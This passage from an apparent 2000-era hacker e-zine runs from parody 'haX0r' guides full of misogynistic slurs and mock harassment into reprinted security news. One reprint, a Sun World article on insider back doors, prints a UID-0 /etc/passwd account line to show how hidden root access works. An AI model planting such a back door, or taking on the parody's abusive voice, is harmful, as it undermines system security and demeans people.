everyone of your accomplishment. This will let them know how leet you are, and show them you are one to ph33r. (This will help you get all the chix0rs, see later sections.) Section 8: HaX0ring your local Gibson by Mike Any real haX0r will tell you that a Gibson is a huge supercomputer with amazing security. How do they know? How else? They watched "Hackers" and learned it all. Now, the trick is to find one of these. All you have to do is call your friendly FBI office and ask them for a Gibson dialup. Make sure your intentions are clear, or they'll lie to you. Next, go to Phreak and bug everyone asking if anyone can card you a laptop. When DCY is done ripping you off, take your laptop and magically hook it up to a payphone. I won't get into how to do this, because its too 31337 for a beginner. Now, all you have to do is use a phone dialing program and call the dialup. Once you've connected, Run in a cirle, stomp on the ground, strip naked and jump on top of the phone booth screaming to old women near you, "I AM DADE MURPHY!!! PH33R ME!!!" then get down, and turn your brand new laptop on and off about 400 times really fast. This should give you a mail port. If it doesn't, the Gibson doesn't properly ph33r you and you should get another number, but this time try calling the CIA. They're usually alot more friendly. Once you've successfully gained access, be sure to post all of your achecivements on your local Warez/HaX0r/p0lice BBS. (VERY IMPORTANT.....Make sure your not wearing Nikes while trying this. I'm not sure why, but it has something to do with compatibilty.) Section 9: Extended phreaking By Mr. Azure "Real men use paperclips." "This room's called leet for a reason." - Exodus##### from PR: leet NOTE: If your worried about being caught, Please refer to the end of this article. Alright, get all your little asses around here. Way back before you were making model airplanes, jerking off, and hax0ring, there where the Warriors of the Almighty Paperclip. Armed with only with a paperclip and the occasionaly back hoe, these brave adolscents would use the combined power of these menial tools and their intelligence to operate payfones in amazing ways. One of the most legendary and perhaps the best of the Warriors of the Almighty Paperclip was the vernerable and supreme uberpaperclipman, Timmy. When Timmy was 10, he was playing on his fathers construction site. Timmy, being the child prodigy that he was, figured out something amazing: if he took a paperclip, any old paperclip, and put it on the RT terminals (if the preceeding terms don't make sense, try doing what Timmy does in the coming sentances of wonder) he would not only be shocked and possibly burned, but that fone would NOT WORK WHILE THE PAPERCLIP WAS IN PLACE!! Timmy, because he was dropped on his head from a height of 10 feet at the age of 2, had a problem of not remembering. Foretunately for the phreak community at large, a 2x4 came shooting out of no wear and hit Timmy in his now mishapened head. That wonderous peice of flying wood cemented the paperclip into Timmy's memory*. So Timmy, who made a transformation comparable to that of Job's in The Lawnmower Man with a peice of wood, took his wheelchair to payfones, and using one of those illustrious paperclips, managed to... WAIT! I hear you bitching! You stupid old schooler! What the HELL does this have to do with me?! Is THAT what your saying? Well, not much, but it was a nice story. Actually, if your scrawny asses have ever seen Wargames, you would know that kid with the bad haircut managed to get a free call with a paperclip. Alas, today, it is not as easy as it once was. See, back in Wargame's time, which, incedentally, for those who'd like to know when it was made, 15 years or so before the movie Hackers**, paynfones used to be easy to phreak. But NO MORE! In the last phreaking article, you may of heard about the red box, the blue box, and the beige box. If not, well then drink some more cuervo, sit back, and enjoy the ride. For simplicity's sake, we'll start with a very useful box, the cardboard box. This is a relatively easy to make box, but you would be forgiven if the box wasn't completed in under a day. To make a cardboard box, you'll need: a big cardboard box, a red box, a car, and some hard liquor. The only two ingredients essential are the cardboard box and the hard liquor. Prefferably scotch. Speaking of hard liquor, in my next article, I'll be talking about old fashioned RPGs. Back to the subject at hand. If you have your cardboard box and your scotch, it's time you find a payfone. Once the payfone is reached, drink a quarter of the bottle of scotch. And not in those little girly swigs, I'm talking BAM! Then, after you get back up, take the receiver of the payfone and shove it through the top of the big cardboard box. Dial a random 800 number, for example. Then proceed to get underneath the box, and practice fone copulation with the operator you reach. At every minute, or when it feels best, continue to take large doses of the scotch. Remember: after this excursion, YOU MUST GO IN AOL AND SCROLL THIS ACCOMPLISHMENT! Otherwise, you really didn't phreak. And besides, the chix0rs and hax0rs'll never know of you then. And with cuspy bodies like they have, you can't miss out. I hope this file has been helpful, if not, well, thank the cuervo for that. GLOSSARY: 1. Paperclip - Metal peice, found in offices, used to hold papers together. Or that's what they want you to think. In actuallity, the paperclip is an invention by a grandmaster phr33k in the sky as a gift to all. (I met him once. He's a big boy, ya know. If you wanna meet him, try drinking some everclear and hitting your head against the wall after you wake up.) FOR MORE INFORMATION ON THE PAPERCLIP, PLEASE REFER TO TERM 5 IN THIS GLOSSARY. 2. AOL - America Online. Of all networks, this is the best. All of the truly leet hax0rs and phr33ks inhabit AOL. Please refer earlier in this file for more about AOL. 3. MST3k- Funny show. Watch it or die. 4. South Park- Funny show. Watch it or die. PLEASE REFER TO BEGINNING OF ARTICLE ------------- *This didn't actually happen. The paperclip was still in Timmy's hand, but the thought of it was in his brain permenantly. **True k-radness is shown also in worshopping the movie Hackers. Thus, if you want to tell a fellow hax0r or phr33k a date, like if your birthyear 1984, you'd say "Oh, I was born 10 years before before Hackers came out." Section 10: Chix0rs, and How to get them. By Orin Chix0rs are one of the great rewards of being a truly 1337 hacker. The true hacker has all the chix0rs he desires as his fingertips. A chix0r is a female hacker. Of course, girls *can't* be hackers, but, its nice to have a few who pretend; it adds diversity to the hax0r community. A good way find out if there are any chix0rs around is to go into private rooms and ask around (i.e. "R THERE N E FEMALES IN DA ROOM?!?!!?!?!!@#!?"). I've heard there are lots of girls in a private room called Phreak, but, thats just a lame \\'aReZ room. So, after you have determined that there are indeed chix0rs inhabiting your room, its probably a good idea to win them over with your obviously 1337 charm. You do this by showing them who's boss. For example: Xir0KewL: R THERE NE CHIX IN DA ROOM?!?!!@#!?!?!??! Chix0r43: Argh, there they go again :-/ Xir0KewL: CHIX0R, R U FEMALE?!?! Chix0r43: I am genderless. Xir0KewL: PHUCK OFF BITCH . Chix0r43: eh? Xir0KewL: DUMB PUSSY LICKING BITCH. U QUEEF TAMPONS OUT YR ASS!!@!!!! Chix0r43: hehe, i bet he feels inadequate Xir0KewL: SHUT UP, BITCH, YOU DONT MAKE NO SINCE As you can seel, Chix0r43 obvously wants Xir0KewL, and its just a matter of him punting her a few times to get her to see this. A large part of obtaining chix0rs is being ph33red (see Section 3). If you are ph33red by the chix0rs, it puts you one step closer to total hax0r domination (see Appendix). Section 11: BBS hax0ring for dummies. By Cochise The first step to hacking a BBS (Bulletin Board System) is to find the phone number for one. The best way to do this is to go to the best hacking resource there is, AOL. Go into all of the chat rooms, ecspecially the warez rooms, and scroll many times asking for a BBS number in your area code. IMPORTANT: you must scroll many times or you will not get a number. After you scroll it about 100 times people will think you are so elite that they will give you a BBS number. Another way to get a number is to subscribe to all of the hax0r mailing lists and newsgroups you can find and post many messages a day asking for a BBS number in your area code. You can also tell them your phone number, that helps out alot. And once you have the number the hard part is over. The next thing you have to do is dial the number with your communication software. HyperTerrible™ is the best, but it only comes with Microsoft Unix 97, so use whatever you have. Once you connect login with a name like John Q. Phreak just so everyone knows that they should ph33r you (See Section 3). Once you get on download everything you can find, even if you dont know what it is. But dont be a leech, make sure your upload/download ratio is at least 300:1. Send messages to the sysop and tell him how "/<- r4D" he is and ask if you can upload your 31337 warez to the board (and do it anyways even if he says no). Become friends with him and find out a time when no one will be at his house. Then look up his address in the phone book (because being the l33t hax0r you are you already know his real name). Now this is where the real hacking begins. Before you go hax0ring around you must have the proper tools: 1) Hard liquor (See Section 9) 2) An axe (more on this later) 3) Your laptop (of course you have a laptop youre 31337) The next step is to go to his house (you may use tool number one at any time). Then you must find an exploit that will let you into his house (break in). If you can not find one, brute force hacking (with the axe ) is always good. Then make your way to the where the computer is. This is your moment of zen, you are now about to hax0r a BBS. The next thing you do is get the axe and hold it as far back as you can, then bring it down as hard as you can hacking the CPU, monitor, keyboard, mouse and any other computer parts you see. The last step in becoming a BBS Uberhax0r is to plug your laptop into the modem and immediatly sign on to AOL and start bragging about your accomplishment and letting everyone marvel in your glory so they know how lame they really are. Section 12: Advanced Hacking Techniques by gat0r (ali) DiScLaImEr: ThIs FiLe Is WrItTeN fOr InFoRmAtIoN pUrPoSeS oNlY-iF yOu GeT cAuGhT dOiNg AnYtHiNg IlLeGaL iT iZ n0t My FaUlT!@#$%@#$%. INTR0: Yo, gat0r here, keepin it real. i wrote dis gizzit cuz i'm all about the phreedom of information. (well, i'm really not. if i cared about the phreedom of information i'd get a job at the public library. i really wrote this file to satisfy my ego and advance my social status in hacking circles. maybe someday a kewl looking hacker chick like acid burn will have sex with me.) topics discussed in hea will not be about encryption, sploits, protocols or any of that lame shit. what this is all about is what REAL hackers do: get inf0z. PART_1: GeTtInG aCcEsS tO YoUr LiBrArY Ok, hackers want information. they love information. info turns them on. Now, s'pose you suck. this shouldn't be hard. now let's s'pose you want to learn unix...you heard eggheads talk about it in chatrooms and it sounds elite. But wait! Silicon Toad doesn't have any good filez on it. you wanna know why? he sucks ass. but that's besides the point. A source of good info on unix would be your public library! i know, i know...they took away your library card for never returning _coping_with_being_a_loser_. But i figured out a way to help you get your info. just walk in, ask the librarian for books on unix (using the card cataloge is far too advanced for you right now) and then sit down and read it. Problems? Here's a list of what may have went wrong (btw- don't do these in the future): -you went when they are closed. -you went naked, cops arrested you, then anally raped your arse. -all the metal shit on yer pierced face set off the stolen book detectors. It's that easy. Now get some Kn0wLeDgE. PART_2: GeTtInG iNf0z On PeOpLe For some reason, knowing someone's name, address, telephone number, etc etc is real elite. Just ask s010 from CRH. In all his zines he gets inf0z on those sinnerz dorks. god damnit, this is so dumb i won't even write it. just use a f00kin telephone book. wow, i 0wN j00. i got your telephone numbers. look at me guys, i'm cool. damnit...alcohol is kiickin in. PART_3: Reading Ok, i'm sober again. Reading is an important technique/skill hackers master. Being able to read helps you understand the words in book that give you elite k-rad knowledge. Call 1800-abcdefg for more info on how to read. once you learn how to read, you're all set. ENDTRO: Fuck you all. seriously. each and every one of you. i 0wn you all. i am elite and you can all lick my balls. king kong size balls for that matter. @HWA 58.0 FAA Systems Vulnerable Due to Y2K Fixes 01/05/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The General Accounting Office has said that the federal Aviation Administration's procedures for fixing the Y2K problem have left it wide open to attack. The GAO alleges that the use of foreign nationals to review potential Y2K problem code allowed back doors and other nasty tidbits to be left behind. As of yet no actual evidence has been found to support these claims. Wired http://www.wired.com/news/politics/0,1283,33432,00.html Federal Computer Week http://www.fcw.com:80/pubs/fcw/2000/0103/web-faay2k-01-04-00.html GAO Report - PDF File http://www.gao.gov/new.items/ai00055.pdf Wired; Report: Airport Safety at Risk by Declan McCullagh 3:00 a.m. 5.Jan.2000 PST WASHINGTON -- It's a made-for-the-Net tale with all the right ingredients: Y2K, hackers, terrorists, and planes flying straight into the ground. The US Federal Aviation Administration's slipshod security when reprogramming air traffic computers for the year 2000 has made the system more vulnerable to sabotage, government auditors said Tuesday. More Infostructure in Wired News Read more Politics -- from Wired News Dozens of Chinese citizens and other foreign nationals were accidentally hired as programmers charged with repairing important air traffic systems, according to the General Accounting Office. Investigators at the GAO, the auditing arm of Congress, have found no evidence of illicit tampering or espionage, however. "We did not find any such instances during our review," the 35-page report said. But the House Science committee still saw red. "We urge you to determine the extent to which other departments and agencies may have allowed unscreened persons access to the federal critical infrastructure during the process of Y2K remediation," chairman Representative James Sensenbrenner (R-Wisconsin) wrote in a letter to the White House National Security Council. The fuss over foreigners with access to US government computers comes a few weeks after former Los Alamos National Laboratory physicist Wen Ho Lee was indicted on 59 counts of mishandling nuclear secrets, including some on magnetic tape. His attorney said Lee would fight the charges, and some critics of the Justice Department have said the prosecution was racially motivated. The FAA's hiring policy is clear. According to a human resource manual, contractors may hire only US citizens or legal aliens for work performed on government property. But that's not what happened. "FAA contractors used foreign nationals to help remediate mission-critical systems," the GAO said. Chinese, Ethiopian, Irish, and Ukranian citizens worked on one traffic-flow management program. The possibilities of sabotage that could imperil air travel worry the auditors, who investigated FAA facilities in Washington and Atlantic City, New Jersey. An earlier GAO report in May 1998 claimed the FAA had lax physical and electronic security. In response, the FAA in February 1999 hired its first "chief information officer" to respond in part to the problem. It didn't work. "There is inherently more risk that unauthorized changes, which are difficult to detect, could have been made during code renovation. In addition, program errors detected during testing may not have been identified for correction by individuals intending harm, resulting in potential system errors," the GAO said in its report released Tuesday. GAO staff briefed the House Science committee on their findings in December. The FAA said it believes the risk of sabotage is low, but on 10 December distributed a memo reminding employees and contractors of its hiring policies. -=- @HWA 59.0 Internal Employees Greatest Threat Says New Study 01/05/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A survey conducted by Michael G. Kessler & Associates Ltd., a New York-based security firm, found that 35 percent of the theft of proprietary and confidential information is stolen by disgruntled employees. Other U.S. companies steal 18 percent, foreign corporations stole 11 percent and foreign governments took 8 percent. Only 28 percent of information theft was attributed to a lone external attacker. APB News http://www.apbnews.com/newscenter/internetcrime/2000/01/04/comptheft0104_01.html Employees, Not Hackers, Greatest Computer Threat New Study Shows Unhappy Workers Steal Trade Secrets Jan. 4, 2000 By David Noack NEW YORK (APBnews.com) -- The greatest security threat to companies' computer systems comes from disgruntled employees stealing confidential information and trade secrets, according to a new study on cyber-security. The survey, conducted by Michael G. Kessler & Associates Ltd., a New York-based security firm, found that 35 percent of the theft of proprietary information is perpetrated by discontented employees. Outside hackers steal secrets 28 percent of the time; other U.S. companies 18 percent; foreign corporations 11 percent and foreign governments, 8 percent. The remaining 10 percent, according to the study, are listed as miscellaneous crimes. The financial losses caused by these cyber break-ins totaled $42 million last year, which is up more than 100 percent from the 1997 figure of $20 million. 'No such thing as a hacker's holiday' "Computer crime is much more complex than bugs and viruses," said President and CEO Michael G. Kessler. "Y2K enlightened business owners to pitfalls in their systems, but there must also be heightened awareness of the growing number and variety of computer security breaches that can weaken a company's balance sheet." The survey was done over the last six months, and written questions were given to 300 of Kessler's clients and other companies. He said that disgruntled employees could be capable of taking business records, trade secrets and payroll information. "It doesn't take a new millennium for corporate computer piracy to occur," said Kessler. "There's no such thing as a hacker's holiday. Internet invasions increase with growing computer and Internet popularity. Codes can be cracked; systems will be sabotaged. Hacking is a reality, and CEOs who have turned a deaf ear to its existence will be shocked when it happens to their allegedly fail-safe network." Kessler cautioned that now that Y2K is over, corporations shouldn't be lulled into a false sense of security. Hacker attacks not often reported "Problems could just as easily occur on Jan. 30 as Jan. 1. Businesses should brace for outbreaks of sophisticated viruses and hackings from outside and in. Once a breach in computer security has occurred, our research historically reveals much more -- a 'subplot' that can alert corporations to the real root of some serious trouble," said Kessler. He said companies fail to report computer break-ins for fear of bad publicity, and that for every break-in reported, 400 do not. The Kessler study mirrors previous reports showing that computer security is one of the biggest challenges facing corporate America. Computer-crime rates and information-security breaches continue to increase, according to a joint study conducted last year by the Computer Science Institute and the FBI. Losses greater than $100 million The 1999 Computer Crime and Security Survey, based in San Francisco, polled 521 security professionals at U.S. corporations, government agencies and universities. The findings revealed that financial losses among 163 respondents totaled $124 million, which was the third straight year the survey had recorded losses greater than $100 million. "It is clear that computer crime and other information security breaches pose a growing threat to U.S. economic competitiveness and the rule of law in cyberspace," said Richard Power, editorial director of the institute. "It is also clear that the financial cost is tangible and alarming." System break-ins by outsiders were reported by 30 percent of respondents, and unauthorized access by insiders was reported by 55 percent. Technology not enough Even though security measures, such as digital identification, encryption and intrusion-detection systems are being used more frequently, technology itself is not enough to stymie hackers. The study also found that 98 percent of respondents said they use anti-virus software, 90 percent reported incidents of virus contamination. Also, system penetration from outside grew for the third straight year despite 91 percent of respondents saying they used firewalls. "The lesson to be learned is simple security technology does not equal a security program," said Power, suggesting that well-trained, motivated staff and smart procedures are just as important for security as technology. Justice Department stepping in The problem of proprietary information being breached on computer systems has prompted the Justice Department to devote an entire section to computer crimes, called the Computer Crime and Intellectual Property section. In addition, the Economic Espionage Act of 1996 is expected to be used to prosecute foreign sources of computer crime. Michael A. Vatis, director of the FBI's National Infrastructure Protection Center, agrees that a "disgruntled insider" is the principal source of computer crimes. "Insiders do not need a great deal of knowledge about computer intrusions, because their knowledge of victim systems often allows them to gain unrestricted access to cause damage to the system or to steal system data. The 1999 Computer Security Institute/FBI report notes that 55 percent of respondents reported malicious activity by insiders," Vatis told a Congressional committee last year. Coast Guard lost data Recent cases of white-collar computer crimes include: Shakuntla Devi Singla used her insider knowledge and another employee's password and log-on identification to delete data from a U.S. Coast Guard personnel database system. It took 115 agency employees over 1,800 hours to recover and re-enter the lost data. Singla was convicted and sentenced to five months in prison and five months home detention and ordered to pay $35,000 in restitution. Software engineer William Gaed, working for a subcontractor to Intel Corp., was convicted of illegally downloading secret data on the computer giant's plans for a Pentium processor worth between $10 million and $20 million. Authorities said Gaed also videotaped information on his computer screen and planned to sell the tapes to a competitor. Gaed was sentenced to 33 months in prison. And, according to a General Accounting Office (GAO) report issued in October, the federal government has been lax in protecting computer networks used by government and businesses. "At the federal level, these risks are not being adequately addressed," the report said. U.S. unprepared for information threat The report showcased concerns of some experts about threats to private-sector systems that control energy, telecommunications, financial services, transportation and other critical services. "Few reports are publicly available about the effectiveness of controls over privately controlled systems," GAO said. Currently, there is no strategy to improve government information security, the GAO report found. If the United States is faced with a threat, the response could be "unfocused, inefficient and ineffective," wrote Jeffrey Steinhoff, the acting assistant comptroller general. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). @HWA 60.0 Are the Greatest Risks Internal or External? 01/05/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Who is the biggest risk to your network security? Is it he cyber intruder trying to knock over your firewall from the outside? Or is it the trusted employee who already has the administrative access? Carole Fennelly at Sun World takes a look at these internal security threats. Sun World http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html Who gets your trust? Security breaches can come from those you least suspect Summary Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust? (3,000words) In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right? Wrong. Their intention did not matter -- the security of the system has been bypassed. This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything. What is a back door? Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security. Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it. In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. It can also be a program set up to invoke system privileges from a nonprivileged account. A simple back door is an account set up in the /etc/password file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root: auser:x:0:101:Average User :/home/auser:/bin/ksh If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole. It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent. Back doors can also be set up in subtler ways though SUID 0 programs (which set the userid to root). Usually, the motivation for setting up back doors is one of expediency. The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge. Proprietary data A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data. Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts. In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"? System monitoring Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges. What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it. What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to. Countermeasures You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee. Background checks You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught). The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children. I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area. In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations. What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit? Be honest: would you perform the same background checks regardless of a person's appearance? Technical measures Some technical software packages can limit or control superuser privileges. I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to. sudo The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description. Tripwire Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files. Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column. Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent? Professionalism The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior. During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as: No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator. All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient. Users' files may not be modified or read except in the case of a predetermined problem or security investigation. Be prepared to justify. Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential. The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately. Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing. All administrative procedures and tools are to be considered proprietary information and are the property of the computer center. Tape archives may not be removed from the facility without written approval. Discretion A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it. At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!) Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations. Final thoughts Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street. As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker." The only difference is the label. Disclaimer: The information and software in this article are provided as-is and should be used with caution. Each environment is unique, and readers are cautioned to investigate, with their companies, the feasibility of using the information and software in this article. No warranties, implied or actual, are granted for any use of the information and software in this article, and neither the author nor the publisher is responsible for any damages, either consequential or incidental, with respect to the use of the information and software contained herein. About the author Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms and of late has focused on sendmail configurations. Carole provides security consultation to several financial institutions in the New York City area. @HWA 61.0 Japanese Firms Turn To Security After Y2K 01/05/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench With the conclusion of many Y2k efforts many Japanese companies will be turning those resources onto increasing the security of their computer systems. A survey conducted by Nikkei Internet Technology of major Japanese firms indicated that resources will now be applied to creating more secure systems. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/90770 Japanese Firms to Boost Net System Security after Y2K Issue Subsides December 29, 1999 (TOKYO) -- Japanese corporate efforts geared toward Y2K software readiness will soon conclude, and many companies will then focus on constructing better Internet systems. Nikkei Internet Technology conducted a survey in October and November on Japanese companies to ascertain what kind of Internet technologies and systems they seek to put in place and what kind of measures they are taking to counter computer viruses and cases of unauthorized access. The following is a brief overview of the survey results. The respondents of the survey are companies listed on the first and second sections of the Tokyo Stock Exchange, the Osaka Securities Exchange and the Nagoya Stock Exchange, which have their own home pages, as well as unlisted companies with sales of at least 30 billion yen a year. (102.90 yen = US$1) Nikkei Internet Technology sent questionnaires to more than 2,600 companies and about 900 of them responded to the questionnaire. The findings indicate that about 80 percent of the respondents said they had introduced the Internet prior to 1997. However, their access environment is not on a satisfactory level yet, as the Internet-access speed for about 95 percent of them was 1.5Mbps or slower. Nikkei Internet Technology was surprised to learn the survey results on corporate experiences in the area of computer viruses. The survey discovered that 90 percent of the respondents said they have been infected with viruses. In fact, the editorial department of Nikkei Internet Technology also discovered its system was infected with computer viruses a few times in the past several months. In one case, our computers were infected with a virus through a news release in the form of an attached file on Microsoft Word software. All of our staffers use antivirus software and update a pattern file of the software regularly so that the software can handle any new types of virus. We can see the importance of taking regular measures to prevent virus infections. According to the survey findings, 66 percent of the companies said all of their employees use antivirus software and 94 percent of them said some of their employees do so. We believe that there will be a growing need to introduce such prevention measures against computer viruses. Meanwhile, only about 20 percent of the respondents said they have had unauthorized access from outside. Although we have not analyzed the results in detail yet, we found that a few companies have actually suffered damage resulting from intrusions. Some firms have reported that they had their ports scanned by someone. It is obvious that Japanese companies need to address issues of unauthorized access. Slightly fewer than 25 percent of the companies said they have already introduced a tool that detects vulnerable areas in system security, the survey finds. However, more than 40 percent of them said they do not plan to introduce such a tool or they don't know if they will do so soon. We found that it will be inevitable for these companies to introduce such new systems as Internet VPN, encryption mail and Single Sign-on and to adopt preventive measures against computer viruses and cracking. (Norio Inaba, Editor-in-Chief, Nikkei Internet Technology @HWA 62.0 Virus FUD Continues 01/05/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench After forecasting 30,000 new viruses to attack on January 1, the mainstream media seems to be still playing up the Virus angle. Basically they all say that 'No viruses for Y2K, but they might still arrive.' The FUD factor in some of these articles is amazing. Yes, Viruses are a threat, but they are no more a threat today than they where last week. The Straits Times - No virus attacks on computers on Jan 1 http://www.straitstimes.asia1.com/cyb/cyb1_0105.html Yahoo News - Trend Micro Discovers 14 New Viruses http://biz.yahoo.com/bw/000103/ca_trend_m_1.html Sydney Morning Herald - Bug-free so far, but virus may lurk http://biz.yahoo.com/bw/000103/ca_trend_m_1.html Australian Financial Review - New computer viruses crop up with year 2000 http://www.afr.com.au:80/content/000104/update/update44.html Excite News - NAI Recommends Continued Caution http://news.excite.com:80/news/pr/000103/ca-network-assoc-y2k Straits Times; 404 Yahoo News; Monday January 3, 8:04 am Eastern Time Company Press Release Trend Micro Discovers 14 New Viruses/Worms During Y2K Rollover Provides Monday Morning Tips for Computer Users Trend Micro Recommends Monday Morning Precautionary Measures to Help Computer Users Minimize Risk of Virus Outbreaks CUPERTINO, Calif.--(BUSINESS WIRE)--Jan. 3, 2000-- Trend Micro Inc. (Nasdaq:TMIC - news; Japan OTC:4704), a leading provider of Internet virus protection, today announced discovery of fourteen (14) new viruses over the Millennium weekend by its special Y2K virus watch eDoctor(TM) engineers, who have been working 24x7 since December 15th in anticipation of increased virus activity leading up to Y2K. Four (4) of these new viruses had Y2K-associated trigger dates or messages associated with them. During this same time period, six (6) viruses were detected at customer sites in North America. Trend Micro has updated its virus definition files to defend against all fourteen of these newest computer virus threats and advises computer users to update their virus protection software first thing Monday morning to ensure protection and to use extra caution when opening email attachments. At the time of writing, these viruses are not considered a serious threat. During the past seven days, Trend Micro's World Virus Tracking Center recorded more than 4,000 infected computer systems worldwide. The World Virus Tracking Center at http://wtc.trendmicro.com/wtc/, monitors in real time the activity and travel patterns of viruses worldwide. Figures are based on the scanning results of users worldwide who surf to Trend Micro's web site and use its free on-line virus scanning tool, HouseCall(TM), to scan and rid their computers of viruses. Viruses discovered at customer sites from December 31 to January 2 include: -- W97M_Chantal.B -- (Y2K VIRUS) a destructive Word 97 macro virus that infects documents and templates and also tries to delete all files in c:\ drive. Similar to W97M_Chantal.A, W97M_Chantal.B has the same payload, which triggers on the 31st day of the month and displays a message box with the following content: "Y2K is Coming Soon..." . -- VBS_LUCKY2000 -- (Y2K VIRUS) an overwrite-type worm that is written in Visual Basic Script. Once executed it overwrites files in the same directory with itself and makes them 866 bytes in size. Then it creates a shortcut on the desktop, which points to a web site in Russia. Once the URL is created, it tries to connect to that web site using the default browser. -- TROJ_WINKILL (a.k.a. 